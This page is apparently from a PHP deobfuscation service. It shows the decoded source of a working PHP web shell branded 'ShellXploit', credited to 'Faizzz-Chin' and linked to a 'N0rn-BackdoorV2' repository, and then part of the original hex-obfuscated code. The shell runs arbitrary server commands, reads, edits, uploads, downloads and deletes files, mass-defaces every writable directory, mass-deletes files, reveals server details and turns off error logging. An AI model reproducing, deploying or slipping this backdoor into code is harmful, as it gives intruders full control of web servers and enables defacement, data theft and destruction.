Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto k7S49; M7nN2: function ok() { echo "\74\x64\x69\166\40\x63\154\141\163\163\75..
Decoded Output download
<?php
goto k7S49; M7nN2: function ok() { echo "<div class="alert alert-success alert-dismissible fade show my-3" role="alert"><button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>"; } goto RF46d; jAGHx: date_default_timezone_set("Asia/Jakarta"); goto Q8f_k; pvdiH: if (isset($_GET["filesrc"])) { echo "<br><b>name : </b>" . basename($_GET["filesrc"]); "</br>"; echo "\xa<div class="container-fluid language-javascript">
<div class="shell mb-3">
\x9<pre style="font-size:10px;"><code>" . htmlspecialchars(file_get_contents($_GET["filesrc"])) . "</code></pre>
\x9</div>\xa</div>"; } elseif (isset($_GET["option"]) && $_POST["opt"] != "hapus") { echo "<br><b>name : </b>" . basename($_POST["path"]); "</br>"; if ($_POST["opt"] == "ganti_nama") { if (isset($_POST["nama_baru"])) { if (rename($_POST["path"], $path . "/" . $_POST["nama_baru"])) { echo "<script>window.location='?path={$path}'</script>"; } else { echo "<strong>Ganti nama</strong> gagal! " . er() . "</div>"; } $_POST["name"] = $_POST["nama_baru"]; } echo "\xa<form method="POST">\xa\x9<div class="input-group mb-3">
\x9\x9<input class="form-control form-control-sm" name="nama_baru" type="text" value="" . $_POST["name"] . "" />
\x9 \x9<input type="hidden" name="path" value="" . $_POST["path"] . "">
\x9 <input type="hidden" name="opt" value="ganti_nama">
<input class="btn btn-outline-light btn-sm" type="submit" value="ganti nama"/>\xa\x9</div>
</form>"; } elseif ($_POST["opt"] == "edit") { if (isset($_POST["src"])) { $fp = fopen($_POST["path"], "w"); if (fwrite($fp, $_POST["src"])) { echo "<strong>Edit</strong> ok! " . ok() . "</div>"; } else { echo "<strong>Edit</strong> gagal! " . er() . "</div>"; } fclose($fp); } echo "\xa<div class="mb-3">
<form method="POST">
<textarea class="form-control form-control-sm mb-3" rows="7" name="src">" . htmlspecialchars(file_get_contents($_POST["path"])) . "</textarea>
\x9 \x9<input type="hidden" name="path" value="" . $_POST["path"] . "">\xa\x9\x9 <input type="hidden" name="opt" value="edit">
\x9 <input class="btn btn-outline-light btn-sm btn-block" type="submit" value="edit"/>\xa\x9</form>
</div>"; } } else { if (isset($_GET["option"]) && $_POST["opt"] == "hapus") { if ($_POST["type"] == "dir") { if (rmdir($_POST["path"])) { echo "<script>window.location='?path={$path}'</script>"; } else { echo "<strong>Hapus dir</strong> gagal! " . er() . "</div>"; } } elseif ($_POST["type"] == "file") { if (unlink($_POST["path"])) { echo "<script>window.location='?path={$path}'</script>"; } else { echo "<strong>Hapus file</strong> gagal! " . er() . "</div>"; } } } $scandir = scandir($path); $pa = getcwd(); echo "
<div class="bkp table-responsive">
<table class="table table-hover table-dark text-light mt-4">\xa<thead>\xa<tr>\xa\x9<td class="text-center">Name</td>
<td class="text-center">Last Edit</td>
\x9 <td class="text-center">Size</td>
\x9\x9<td class="text-center">Owner<gr>:</gr>Group</td>
<td class="text-center">Permission</td>\xa <td class="text-center">Options</td>\xa</tr>
</thead>\xa<tbody class="text-nowrap">\xa<tr>\xa <td><i class="bi bi-folder2-open"></i><a class="text-decoration-none text-secondary" href="?path=" . dirname($dir) . "">..</a></td><td></td><td></td><td></td><td></td><td class="text-center">\xa\x9\x9<div class="btn-group">\xa \x9\x9<a class="btn btn-outline-light btn-sm" href="?filebaru&path=" . $dir . ""><i class="bi bi-file-earmark-plus-fill"></i></a>\xa\x9\x9 <a class="btn btn-outline-light btn-sm" href="?dirbaru&path=" . $dir . ""><i class="bi bi-folder-plus"></i></a>\xa </div>\xa\x9</td>
</tr>"; foreach ($scandir as $dir) { $dt = date("Y-m-d H:i:s", filemtime("{$path}/{$dir}")); if (function_exists("posix_getpwuid")) { $downer = @posix_getpwuid(fileowner("{$path}/{$dir}")); $downer = $downer["name"]; } else { $downer = fileowner("{$path}/{$dir}"); } if (function_exists("posix_getgrgid")) { $dgrp = @posix_getgrgid(filegroup("{$path}/{$dir}")); $dgrp = $dgrp["name"]; } else { $dgrp = filegroup("{$path}/{$dir}"); } if (!is_dir("{$path}/{$dir}") || $dir == "." || $dir == "..") { continue; } echo "
<tr>\xa <td><i class='bi bi-folder-fill'></i><a class='text-decoration-none text-info' href="?path={$path}/{$dir}">{$dir}</a></td>
<td class='text-center'>{$dt}</td>
\x9<td class='text-center'>-</td>\xa\x9<td class='text-center'>{$downer}<gr>:</gr>{$dgrp}</td>
\x9<td class='text-center'>"; if (is_writable("{$path}/{$dir}")) { echo "<gr>"; } elseif (!is_readable("{$path}/{$dir}")) { echo "<rd>"; } echo p("{$path}/{$dir}"); if (is_writable("{$path}/{$dir}") || !is_readable("{$path}/{$dir}")) { echo "</gr></rd></td>"; } echo "\xa\x9<td class="text-center">
\x9<form method="POST" action="?option&path={$path}">
<div class="btn-group">
<button class="btn btn-outline-light btn-sm" name="opt" value="ganti_nama"><i class='bi bi-pencil-fill'></i></button>\xa <button class="btn btn-outline-danger btn-sm" name="opt" value="hapus"><i class='bi bi-trash-fill'></i></button>\xa </div>
\x9 <input type="hidden" name="type" value="dir">\xa <input type="hidden" name="name" value="{$dir}">
\x9<input type="hidden" name="path" value="{$path}/{$dir}">
</form>
</td>\xa</tr>"; } foreach ($scandir as $file) { $ft = date("Y-m-d H:i:s", filemtime("{$path}/{$file}")); if (!is_file($path . "/" . $file)) { continue; } if (function_exists("posix_getpwuid")) { $fowner = @posix_getpwuid(fileowner("{$path}/{$file}")); $fowner = $fowner["name"]; } else { $fowner = fileowner("{$path}/{$file}"); } if (function_exists("posix_getgrgid")) { $fgrp = @posix_getgrgid(filegroup("{$path}/{$file}")); $fgrp = $fgrp["name"]; } else { $fgrp = filegroup("{$path}/{$file}"); } echo "\xa<tr>\xa <td><i class='bi bi-file-earmark-code-fill'></i><a class='text-decoration-none text-secondary' href="?filesrc={$path}/{$file}&path={$path}">{$file}</a></td>\xa <td class='text-center'>{$ft}</td>\xa <td class='text-center'>" . sz(filesize($file)) . "</td>\xa <td class='text-center'>{$fowner}<gr>:</gr>{$fgrp}</td>\xa\x9<td class='text-center'>"; if (is_writable("{$path}/{$file}")) { echo "<gr>"; } elseif (!is_readable("{$path}/{$file}")) { echo "<rd>"; } echo p("{$path}/{$file}"); if (is_writable("{$path}/{$file}") || !is_readable("{$path}/{$file}")) { echo "</gr></rd></td>"; } echo "\xa\x9<td class="text-center">
\x9\x9<form method="POST" action="?option&path={$path}">
\x9 \x9<div class="btn-group">\xa \x9\x9<button class="btn btn-outline-warning btn-sm" name="opt" value="edit"><i class='bi bi-pencil-square'></i></button>
\x9 <button class="btn btn-outline-light btn-sm" name="opt" value="ganti_nama"><i class='bi bi-pencil-fill'></i></button>
\x9\x9 <button class="btn btn-outline-light btn-sm" name="opt" value="download"><i class='bi bi-download'></i></button>\xa\x9 \x9 <button class="btn btn-outline-danger btn-sm" name="opt" value="hapus"><i class='bi bi-trash-fill'></i></button>
\x9</div>\xa\x9\x9\x9<input type="hidden" name="type" value="file">
\x9\x9\x9<input type="hidden" name="name" value="{$file}">\xa\x9 <input type="hidden" name="path" value="{$path}/{$file}">
\x9</form>
\x9</td>
</tr>"; } } goto auUCq; vlR1j: for ($i = 0; $i <= $c_dir; $i++) { $scdir[$i]; if ($i != $c_dir) { } if (isset($_GET["mass_deface"])) { echo "{$_s}"; function massSemua($dir, $namafile, $isi_script) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}/{$dirb}"; $pe = $dirc . "/" . $namafile; if ($dirb === ".") { file_put_contents($pe, $isi_script); } elseif ($dirb === "..") { file_put_contents($pe, $isi_script); } else { if (is_dir($dirc)) { if (is_writable($dirc)) { echo "[<gr><i class='bi bi-check-all'></i></gr>] {$pe}<br>"; file_put_contents($pe, $isi_script); $pathPattern = massSemua($dirc, $namafile, $isi_script); } } } } } } function massBiasa($dir, $namafile, $isi_script) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}/{$dirb}"; $pe = $dirc . "/" . $namafile; if ($dirb === ".") { file_put_contents($pe, $isi_script); } elseif ($dirb === "..") { file_put_contents($pe, $isi_script); } else { if (is_dir($dirc)) { if (is_writable($dirc)) { echo "[<gr><i class='bi bi-check-all'></i></gr>] {$dirb}/{$namafile}<br>"; file_put_contents($pe, $isi_script); } } } } } } if ($_POST["start"]) { if ($_POST["tipe"] == "massal") { massSemua($_POST["d_dir"], $_POST["d_file"], $_POST["script"]); } elseif ($_POST["tipe"] == "biasa") { massBiasa($_POST["d_dir"], $_POST["d_file"], $_POST["script"]); } echo "<br>"; } echo "
<div class='mb-3'>\xa <form method='POST'>
Tipe:\xa <div class='custom-control custom-switch'>\xa <input class='custom-control-input' type='checkbox' id='customSwitch' name='tipe' value='biasa'>\xa \x9<label class='custom-control-label' for='customSwitch'>Biasa</label>
\x9</div>\xa\x9<div class='custom-control custom-switch'>
\x9 <input class='custom-control-input' type='checkbox' id='customSwitch1' name='tipe' value='massal'>
\x9 <label class='custom-control-label' for='customSwitch1'>Massal</label>
\x9</div>
\x9 <i class='bi bi-folder'></i> Lokasi:
\x9 <input class='form-control btn-sm' type='text' name='d_dir' value='{$dir}'>\xa\x9\x9<i class='bi bi-file-earmark'></i> Nama file:
\x9\x9<input class='form-control btn-sm' type='text' name='d_file' placeholder='nama file' {$_r}>\xa <i class='bi bi-file-earmark'></i> Isi file:\xa\x9 <textarea class='form-control btn-sm' rows='7' name='script' placeholder='isi file' {$_r}></textarea>\xa \x9<input class='btn btn-outline-light btn-sm btn-block' type='submit' name='start' value='mass deface'>
\x9</form>\xa</div>"; } if (isset($_GET["cmd"])) { if (!empty($_POST["cmd"])) { $cmd = shell_exec($_POST["cmd"] . " 2>&1"); } echo "{$_s}
<div class='mb-3'>
<form method='POST'>\xa <div class='input-group mb-3'>\xa <input class='form-control btn-sm' type='text' name='cmd' value='" . htmlspecialchars($_POST["cmd"], ENT_QUOTES, "UTF-8") . "' placeholder='whoami' {$_r}>\xa\x9\x9<button class='btn btn-outline-light btn-sm' type='sumbit'><i class='bi bi-arrow-return-right'></i></button>
</div>
</form>"; if ($cmd) { echo "
<div class="container-fluid language-javascript">
<div class="shell mb-3">\xa\x9 <pre style="font-size:10px;"><code>" . htmlspecialchars($cmd, ENT_QUOTES, "UTF-8") . "</code></pre>
\x9</div>
</div>"; } elseif (!$cmd && $_SERVER["REQUEST_METHOD"] == "POST") { echo "<strong>No results.</strong> <div class="bkp table-responsive">" . ini_get("disable_functions") . "</div> " . er() . "</div>"; } echo "\xa</div>"; } if (isset($_GET["phpinfo"])) { @ob_start(); @eval("phpinfo();"); $buff = @ob_get_contents(); @ob_end_clean(); $awal = strpos($buff, "<body>") + 6; $akhir = strpos($buff, "</body>"); echo "<b><pre class='php_info anu'>" . substr($buff, $awal, $akhir - $awal) . "</pre></b>"; die; } if (isset($_GET["upload"])) { echo "{$_s}"; if (isset($_POST["upl"])) { $hasil = count($_FILES["file"]["name"]); for ($isi = 0; $isi < $hasil; $isi++) { $namafile = $_FILES["file"]["name"][$isi]; $up = @copy($_FILES["file"]["tmp_name"][$isi], "{$path}/" . $namafile); } if ($hasil < 2) { if ($up) { echo "<strong>Upload</strong> {$namafile} ok! " . ok() . "</div>"; } else { echo "<strong>Upload</strong> gagal! " . er() . "</div>"; } } else { echo "<strong>Upload</strong> {$hasil} ok! " . ok() . "</div>"; } } echo "\xa<div class='mb-3'>
\x9<form method='POST' enctype='multipart/form-data'>
\x9<div class='input-group mb-3'>\xa \x9 <input class='form-control form-control-sm' type='file' name='file[]' multiple='' {$_r}>\xa\x9 <input class='btn btn-outline-light btn-sm' type='submit' name='upl' value='upload'>
\x9\x9</div>
</form>\xa</div>"; } if (isset($_GET["filebaru"])) { echo "{$_s}"; if (isset($_POST["bikin"])) { $name = $_POST["nama_file"]; $isi_file = $_POST["isi_file"]; foreach ($name as $nama_file) { $handle = @fopen("{$nama_file}", "w"); if ($isi_file) { $buat = @fwrite($handle, $isi_file); } else { $buat = $handle; } } if ($buat) { echo "<script>window.location='?path={$path}'</script>"; } else { echo "<strong>Buat file</strong> gagal! " . er() . "</div>"; } } echo "
<div class='mb-3'>\xa\x9<form method='POST'>\xa \x9<i class='bi bi-file-earmark'></i> Nama file:
\x9\x9<input class='form-control form-control-sm' type='text' name='nama_file[]' placeholder='Nama file' {$_r}>\xa \x9<i class='bi bi-file-earmark'></i> Isi file:
\x9\x9<textarea class='form-control form-control-sm' name='isi_file' rows='7' placeholder='Isi file' {$_r} ></textarea>
\x9<input class='btn btn-outline-light btn-sm btn-block' type='submit' name='bikin' value='buat'>
\x9</form>\xa</div>"; } if (isset($_GET["dirbaru"])) { echo "{$_s}"; if (isset($_POST["buat"])) { $nama = $_POST["nama_dir"]; foreach ($nama as $nama_dir) { $folder = preg_replace("([^\w\s\d\-_~,;:\[\]\(\].]|[\.]{2,})", '', $nama_dir); $fd = @mkdir($folder); } if ($fd) { echo "<script>window.location='?path={$path}'</script>"; } else { echo "<strong>Buat dir</strong> gagal! " . er() . "</div>"; } } echo "
<div class='mb-3'>\xa\x9<form method='POST'>
\x9\x9<i class='bi bi-folder'></i> Nama dir:\xa \x9<div class='input-group mb-3'>\xa <input class='form-control form-control-sm' type='text' name='nama_dir[]' placeholder='Nama dir' {$_r}>\xa\x9\x9\x9<input class='btn btn-outline-light btn-sm' type='submit' name='buat' value='buat'>
\x9 </div>\xa </form>
</div>"; } if (isset($_GET["mass_delete"])) { echo "{$_s}"; function hapusMassal($dir, $namafile) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}/{$dirb}"; $pe = $dirc . "/" . $namafile; if ($dirb === ".") { if (file_exists("{$dir}/{$namafile}")) { unlink("{$dir}/{$namafile}"); } } elseif ($dirb === "..") { if (file_exists('' . dirname($dir) . "/{$namafile}")) { unlink('' . dirname($dir) . "/{$namafile}"); } } else { if (is_dir($dirc)) { if (is_writable($dirc)) { if (file_exists($pe)) { echo "[<gr><i class='bi bi-check-all'></i></gr>] {$pe}<br>"; unlink($pe); $pathPattern = hapusMassal($dirc, $namafile); } } } } } } } if ($_POST["start"]) { hapusMassal($_POST["d_dir"], $_POST["d_file"]); echo "<br>"; } echo "\xa<div class='mb-3'>\xa <form method='POST'>\xa\x9 <i class='bi bi-folder'></i> Lokasi:\xa <input class='form-control btn-sm' type='text' name='d_dir' value='{$dir}'>
\x9\x9 <i class='bi bi-file-earmark'></i> Nama file:\xa \x9<div class='input-group mb-3'>
<input class='form-control btn-sm' type='text' name='d_file' placeholder='nama file' {$_r}><br>
\x9<div class='input-group-append'>
\x9\x9\x9<input class='btn btn-outline-light btn-sm' type='submit' name='start' value='mass delete'>\xa\x9\x9</div>\xa </form>
</div>"; } } goto pvdiH; beCRq: $scdir = explode("/", $dir); goto vlR1j; LEvck: $message = "Line 1
\xaLine 2
Line 3"; goto xroUB; nxs80: $disfunc = @ini_get("disable_functions"); goto gwYvW; Bvxky: echo "\xa<!DOCTYPE HTML>\xa<html>
<head>
\x9 <meta name='author'content='{$_n}'>
\x9<meta name='robots' content='noindex, nofollow' />\xa \x9<title>" . $_SERVER["HTTP_HOST"] . " - {$_n} ShellXploit</title>
\x9 <meta name='viewport' content='width=device-width, initial-scale=0.70'>
<link href='https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css' rel='stylesheet'>\xa <link rel='stylesheet' href='https://cdn.jsdelivr.net/npm/[email protected]/font/bootstrap-icons.css'>
</head>
<body class='text-light'>
<div class='container-fluid'>
<div class='py-3' id='main'>\xa \x9<div class='box shadow bg-dark p-4 rounded-3'>
\x9 <div class='corner text-secondary anu ww'>
\x9 \x9SHELL BYPASS 403 | \xa \x9\x9<div class='tw'>
\x9\x9 \x9<span>\xa\x9 \x9\x9\x9 <span>Modern UI.</span>\xa\x9 \x9 <span>Responsive.</span>
\x9\x9\x9\x9\x9 <span>Powerful.</span>\xa \x9 \x9 </span>
\x9\x9\x9</div>
\x9 \x9</div>
\x9 \x9<a class='text-decoration-none text-light anu' href='" . $_SERVER["PHP_SELF"] . "'><h4>{$_n} Shell</h4></a>"; goto ICBvw; obLyu: function ip() { $ipas = ''; if (getenv("HTTP_CLIENT_IP")) { $ipas = getenv("HTTP_CLIENT_IP"); } else { if (getenv("HTTP_X_FORWARDED_FOR")) { $ipas = getenv("HTTP_X_FORWARDED_FOR"); } else { if (getenv("HTTP_X_FORWARDED")) { $ipas = getenv("HTTP_X_FORWARDED"); } else { if (getenv("HTTP_FORWARDED_FOR")) { $ipas = getenv("HTTP_FORWARDED_FOR"); } else { if (getenv("HTTP_FORWARDED")) { $ipas = getenv("HTTP_FORWARDED"); } else { if (getenv("REMOTE_ADDR")) { $ipas = getenv("REMOTE_ADDR"); } else { $ipas = "IP tidak dikenali"; } } } } } } return $ipas; } goto F9t1M; dSrN9: if (!function_exists("posix_getegid")) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid["name"]; $uid = $uid["uid"]; $group = $gid["name"]; $gid = $gid["gid"]; } goto VILMp; ehEHm: $_x = "<i class='bi bi-menu-up'></i>"; goto LEvck; OZEgT: $path = str_replace("\", "/", $path); goto jQ6Vd; gwYvW: if (empty($disfunc)) { $disfc = "<gr>NONE</gr>"; } else { $disfc = "<rd>{$disfunc}</rd>"; } goto dSrN9; xroUB: $message = wordwrap($message, 70, "\xd
"); goto LMVda; vQfFG: function sz($byt) { $sz = array("B", "KB", "MB", "GB", "TB"); for ($i = 0; $byt >= 1024 && $i < count($sz) - 1; $byt /= 1024, $i++) { } return round($byt, 2) . " " . $sz[$i]; } goto obLyu; X_gAQ: @ini_set("log_errors", 0); goto EnLK0; QRuLl: @ini_set("output_buffering", 0); goto zAXfG; UOtCq: echo " [ " . pathPattern($path, p($path)) . " ]</div>"; goto ChsgR; Q8f_k: $_n = "Faizzz-Chin"; goto wSj3j; VILMp: $sm = @ini_get(strtolower("safe_mode")) == "on" ? "<rd>ON</rd>" : "<gr>OFF</gr>"; goto Bvxky; lcXzh: @ini_set("error_log", null); goto X_gAQ; k7S49: set_time_limit(0); goto nsELO; F9t1M: function p($file) { if ($p = @fileperms($file)) { $i = "u"; if (($p & 49152) == 49152) { $i = "s"; } elseif (($p & 40960) == 40960) { $i = "l"; } elseif (($p & 32768) == 32768) { $i = "-"; } elseif (($p & 24576) == 24576) { $i = "b"; } elseif (($p & 16384) == 16384) { $i = "d"; } elseif (($p & 8192) == 8192) { $i = "c"; } elseif (($p & 4096) == 4096) { $i = "p"; } $i .= $p & 256 ? "r" : "-"; $i .= $p & 128 ? "w" : "-"; $i .= $p & 64 ? "x" : "-"; $i .= $p & 32 ? "r" : "-"; $i .= $p & 16 ? "w" : "-"; $i .= $p & 8 ? "x" : "-"; $i .= $p & 4 ? "r" : "-"; $i .= $p & 2 ? "w" : "-"; $i .= $p & 1 ? "x" : "-"; return $i; } else { return "- ?? -"; } } goto nxs80; wSj3j: $_s = "<style>table{display:none;}</style><div class='bkp table-responsive'><hr></div>"; goto ImCHb; JMbsx: if (isset($_GET["path"])) { $dir = $_GET["path"]; chdir($dir); } else { $dir = getcwd(); } goto MxYjB; nsELO: error_reporting(0); goto lcXzh; jQ6Vd: $paths = explode("/", $path); goto YCgKn; ImCHb: $_r = "required='required'"; goto ehEHm; RF46d: function er() { echo "<div class="alert alert-danger alert-dismissible fade show my-3" role="alert"><button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>"; } goto vQfFG; EnLK0: @ini_set("max_execution_time", 0); goto QRuLl; MxYjB: $dir = str_replace("\", "/", $dir); goto beCRq; YCgKn: foreach ($paths as $id => $pat) { if ($pat == '' && $id == 0) { $a = true; echo "<div class="bkp table-responsive"><i class="bi bi-hdd-rack"></i> : <a class="text-decoration-none text-light" href="?path=/">/</a>"; continue; } if ($pat == '') { continue; } echo "<a class="text-decoration-none" href="?path="; for ($i = 0; $i <= $id; $i++) { echo "{$paths[$i]}"; if ($i != $id) { echo "/"; } } echo "">" . $pat . "</a>/"; } goto UOtCq; ChsgR: echo "
\x9\x9</div>\xa\x9</div>\xa</div>\xa\xa<div class='container-fluid'>
<div class='box shadow bg-dark p-4 rounded-3 mb-3'>
\x9<div class='corner anu'>
<b data-bs-toggle='collapse' data-bs-target='#collapseExample' aria-expanded='false' aria-controls='collapseExample'><i class='bi bi-info-circle'></i> Information Server <i class='bi bi-chevron-down'></i></b>\xa\x9 </div>
<div class='collapse shell mb-3' id='collapseExample'>
\x9\x9<div class='box shadow bg-dark p-4 rounded-3'>\xa\x9 \x9Uname\Kernel: <gr>" . php_uname() . "</gr><br />
\x9\x9\x9Server: <gr>" . $_SERVER["SERVER_SOFTWARE"] . "</gr><br />
\x9 \x9PHP Version: <gr>" . PHP_VERSION . "</gr> <a class='text-decoration-none text-success' href='?phpinfo&path={$path}'>[ PHP INFO ]</a> <br />\xa \x9 Operating System: <gr>" . PHP_OS . "</gr><br />
\x9\x9Server Ip: <gr>" . gethostbyname($_SERVER["HTTP_HOST"]) . "</gr><br />
\x9\x9\x9Your Ip: <gr>" . ip() . "</gr><br />
\x9\x9 Date Time: <gr>" . date("Y-m-d H:i:s") . "</gr><br />
\x9 \x9User: <gr>{$user}</gr> ({$uid}) | Group: <gr>{$group}</gr> ({$gid})<br />\xa\x9 Safe Mode: {$sm}<br />\xa\x9 Disable Function: <span class='bkp table-responsive'>{$disfc}</span>\xa\x9 </div>
\x9</div>\xa<div class='text-center mt-2'>
<div class='btn-group'>
\x9\x9<a class='btn btn-outline-warning btn-sm me-2' href='?upload&path={$path}'><i class='bi bi-upload'></i> Upload</a>
<a class='btn btn-outline-warning btn-sm me-2' href='?mass_deface&path={$path}'><i class='bi bi-exclamation-diamond'></i> Mass Deface</a>
\x9\x9<a class='btn btn-outline-warning btn-sm me-2' href='?mass_delete&path={$path}'><i class='bi bi-trash'></i> Mass Delete</a>
\x9<a class='btn btn-outline-warning btn-sm me-2' href='?cmd&path={$path}'><i class='bi bi-terminal'></i> Console</a>
</div>
</div>"; goto JMbsx; zAXfG: @ini_set("display_errors", 0); goto jAGHx; LMVda: if (isset($_GET["option"]) && $_POST["opt"] == "download") { header("Content-type: text/plain"); header("Content-Disposition: attachment; filename="" . $_POST["name"] . """); echo file_get_contents($_POST["path"]); die; } goto t6Mcd; ICBvw: if (isset($_GET["path"])) { $path = $_GET["path"]; } else { $path = getcwd(); } goto OZEgT; t6Mcd: function pathPattern($path, $p) { if (isset($_GET["path"])) { $pe = $_GET["path"]; } else { $pe = getcwd(); } if (is_writable($pe)) { return "<gr class='anu'>" . $p . "</gr>"; } else { return "<rd class='anu'>" . $p . "</rd>"; } } goto M7nN2; auUCq: ?>
</tbody>
</table>
<div class='nFoot text-center'>© <?php echo " ".date('Y')." $_n";?></div>
<div class="landing-page mt-2">
<ul>
<li>
<a href="" target="_blank"><i class="bi bi-envelope"></i></a>
</li>
<li>
<a href="https://github.com/faizprtsc/N0rn-BackdoorV2" target="_blank"><i class="bi bi-github"></i></a>
</li>
</ul>
</div>
</div>
</div>
</div>
<style>
body {
background: rgb(83, 164, 220);
background: -moz-linear-gradient(90deg, rgba(83, 164, 220, 1) 0%, rgba(164, 53, 205, 1) 100%);
background: -webkit-linear-gradient(90deg, rgba(83, 164, 220, 1) 0%, rgba(164, 53, 205, 1) 100%);
background: linear-gradient(90deg, rgba(83, 164, 220, 1) 0%, rgba(164, 53, 205, 1) 100%);
filter: progid:DXImageTransform.Microsoft.gradient(startColorstr="#53a4dc", endColorstr="#a435cd", GradientType=1);
}
.tw {
display:inline-block;
color: deeppink;
}
.tw > span {
display:grid;
overflow: hidden;
height:1.2em;
}
.tw span span {
width: 0%;
max-width: max-content;
overflow: hidden;
height: inherit;
word-break: break-all;
animation:
c 0.5s infinite steps(1),
t 2s linear infinite alternate,
m 12s steps(3) infinite;
}
.tw span span:before {
content:" ";
display:inline-block;
}
@keyframes t{
90%,100% {width:100%}
}
@keyframes c{
0%,100%{box-shadow:5px 0 0 #0000}
50% {box-shadow:5px 0 0 white}
}
@keyframes m{
100% {transform:translateY(-300%)}
}
.nFoot {
color: #3d86aa;
background-image: -webkit-linear-gradient(0deg, #3d86aa 31%,#ef86de 73%,#29fac1 67%);
background-clip: text;
-webkit-background-clip: text;
-webkit-text-fill-color: transparent;
}
.landing-page {
display: flex;
justify-content: center;
color: #26bd86;
background-image: -webkit-linear-gradient(0deg, #26bd86 42%,#c71cfa 81%);
background-clip: text;
-webkit-background-clip: text;
-webkit-text-fill-color: transparent;
}
.landing-page > ul {
list-style: none;
flex-wrap: wrap;
text-align: center;
display: flex;
}
.landing-page > ul > li > a {
color: white;
font-size: 30px;
margin-right: 25px;
}
</style>
<script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.6.0/prism.js"></script>
<script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.bundle.min.js"></script>
<script src="https://code.jquery.com/jquery-3.3.1.slim.min.js"></script>
</body>
</html>Did this file decode correctly?
Original Code
<?php
goto k7S49; M7nN2: function ok() { echo "\74\x64\x69\166\40\x63\154\141\163\163\75\42\x61\x6c\145\x72\164\x20\141\x6c\145\162\164\55\x73\165\x63\x63\x65\163\163\x20\141\154\145\162\x74\x2d\x64\x69\163\155\151\163\x73\x69\142\154\145\40\146\141\x64\x65\x20\163\x68\x6f\x77\40\155\x79\x2d\x33\x22\x20\x72\157\x6c\145\x3d\42\141\154\145\162\164\42\76\x3c\142\x75\x74\164\x6f\x6e\40\x74\171\x70\x65\x3d\42\x62\x75\x74\164\157\156\x22\x20\x63\x6c\x61\163\x73\75\42\x62\164\156\55\x63\x6c\157\x73\145\42\x20\144\x61\164\x61\55\142\x73\55\144\151\163\155\151\x73\x73\75\x22\141\154\x65\162\164\42\40\x61\x72\x69\x61\x2d\x6c\141\x62\x65\154\x3d\42\103\x6c\157\x73\x65\x22\76\74\57\x62\165\x74\164\x6f\156\x3e"; } goto RF46d; jAGHx: date_default_timezone_set("\x41\x73\151\141\x2f\x4a\x61\x6b\x61\x72\164\x61"); goto Q8f_k; pvdiH: if (isset($_GET["\x66\x69\x6c\145\x73\162\143"])) { echo "\74\142\162\x3e\x3c\142\76\156\141\155\x65\x20\72\40\x3c\57\142\76" . basename($_GET["\x66\151\x6c\x65\x73\162\143"]); "\x3c\57\x62\x72\76"; echo "\xa\74\144\151\166\x20\x63\x6c\x61\163\x73\x3d\x22\143\157\156\x74\x61\151\156\145\162\55\x66\154\x75\x69\144\40\154\141\156\147\x75\141\x67\145\x2d\152\141\166\141\x73\x63\162\x69\x70\x74\42\76\12\11\74\144\151\166\x20\143\x6c\x61\163\x73\75\42\x73\150\145\154\x6c\40\x6d\142\55\63\42\76\12\11\x9\x3c\160\162\145\x20\x73\x74\x79\154\145\75\x22\x66\157\x6e\164\x2d\163\x69\172\145\72\61\x30\x70\x78\73\42\76\74\143\x6f\x64\145\x3e" . htmlspecialchars(file_get_contents($_GET["\146\151\154\x65\163\162\x63"])) . "\74\57\143\157\144\x65\x3e\x3c\x2f\160\x72\x65\x3e\12\x9\x3c\x2f\x64\x69\166\x3e\xa\74\x2f\144\x69\x76\76"; } elseif (isset($_GET["\x6f\x70\164\151\157\156"]) && $_POST["\157\x70\x74"] != "\150\x61\x70\x75\163") { echo "\74\x62\162\76\74\x62\76\x6e\x61\x6d\x65\40\x3a\x20\74\57\142\76" . basename($_POST["\160\x61\x74\150"]); "\74\57\x62\162\76"; if ($_POST["\x6f\x70\x74"] == "\147\141\x6e\x74\x69\x5f\x6e\x61\x6d\x61") { if (isset($_POST["\156\x61\x6d\x61\x5f\x62\141\x72\165"])) { if (rename($_POST["\160\141\164\x68"], $path . "\57" . $_POST["\156\141\x6d\141\x5f\x62\x61\x72\x75"])) { echo "\74\163\143\162\x69\160\x74\76\x77\151\156\x64\x6f\167\x2e\x6c\x6f\143\141\x74\x69\x6f\156\75\47\77\x70\141\164\x68\75{$path}\x27\x3c\x2f\x73\143\162\x69\x70\164\x3e"; } else { echo "\74\x73\164\x72\x6f\x6e\147\76\x47\x61\x6e\164\x69\40\156\141\x6d\141\x3c\57\163\164\162\x6f\x6e\x67\76\40\x67\141\x67\141\154\x21\x20" . er() . "\x3c\x2f\x64\x69\166\76"; } $_POST["\x6e\141\155\x65"] = $_POST["\156\141\x6d\141\x5f\142\x61\x72\x75"]; } echo "\xa\x3c\x66\x6f\x72\x6d\x20\x6d\x65\164\x68\157\x64\x3d\x22\120\117\123\x54\42\76\xa\x9\74\144\151\x76\x20\x63\154\141\163\x73\x3d\x22\x69\x6e\160\165\x74\55\x67\162\x6f\x75\160\40\x6d\142\x2d\63\x22\76\12\x9\x9\74\151\x6e\x70\x75\x74\x20\143\x6c\x61\163\163\75\x22\146\157\x72\x6d\x2d\143\x6f\x6e\x74\162\157\x6c\40\x66\157\x72\155\x2d\x63\157\156\x74\x72\157\154\55\x73\155\x22\40\156\141\155\145\75\42\156\x61\155\141\x5f\142\x61\x72\165\42\40\x74\x79\x70\x65\75\x22\x74\145\170\x74\x22\x20\166\141\x6c\x75\145\75\42" . $_POST["\x6e\x61\155\x65"] . "\42\x20\x2f\76\12\x9\11\x9\74\151\156\160\165\164\40\x74\x79\160\x65\75\x22\150\151\x64\144\145\x6e\42\40\156\141\155\x65\x3d\42\160\141\x74\150\42\40\x76\141\154\165\145\75\x22" . $_POST["\x70\x61\x74\x68"] . 